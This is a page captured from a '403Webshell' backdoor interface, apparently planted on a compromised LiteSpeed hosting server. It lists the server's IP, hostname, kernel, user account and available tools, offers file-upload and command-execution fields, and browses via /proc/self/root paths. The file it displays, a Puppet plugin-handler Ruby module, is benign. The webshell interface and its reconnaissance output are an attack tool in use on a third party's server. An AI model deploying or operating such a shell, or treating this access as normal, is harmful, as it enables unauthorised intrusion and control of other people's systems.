403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.143.237.136
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet/configurer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet/configurer/plugin_handler.rb
# Break out the code related to plugins.  This module is
# just included into the agent, but having it here makes it
# easier to test.
require_relative '../../puppet/configurer'

class Puppet::Configurer::PluginHandler
  SUPPORTED_LOCALES_MOUNT_AGENT_VERSION = Gem::Version.new("5.3.4")

  def download_plugins(environment)
    source_permissions = Puppet::Util::Platform.windows? ? :ignore : :use

    plugin_downloader = Puppet::Configurer::Downloader.new(
      "plugin",
      Puppet[:plugindest],
      Puppet[:pluginsource],
      Puppet[:pluginsignore],
      environment
    )
    plugin_fact_downloader = Puppet::Configurer::Downloader.new(
      "pluginfacts",
      Puppet[:pluginfactdest],
      Puppet[:pluginfactsource],
      Puppet[:pluginsignore],
      environment,
      source_permissions
    )

    result = []
    result += plugin_fact_downloader.evaluate
    result += plugin_downloader.evaluate

    unless Puppet[:disable_i18n]
      # until file metadata/content are using the rest client, we need to check
      # both :server_agent_version and the session to see if the server supports
      # the "locales" mount
      server_agent_version = Puppet.lookup(:server_agent_version) { "0.0" }
      locales = Gem::Version.new(server_agent_version) >= SUPPORTED_LOCALES_MOUNT_AGENT_VERSION
      unless locales
        session = Puppet.lookup(:http_session)
        locales = session.supports?(:fileserver, 'locales') || session.supports?(:puppet, 'locales')
      end

      if locales
        locales_downloader = Puppet::Configurer::Downloader.new(
          "locales",
          Puppet[:localedest],
          Puppet[:localesource],
          Puppet[:pluginsignore] + " *.pot config.yaml",
          environment
        )
        result += locales_downloader.evaluate
      end
    end

    Puppet::Util::Autoload.reload_changed(Puppet.lookup(:current_environment))

    result
  end
end

Youez - 2016 - github.com/yon3zu
LinuXploit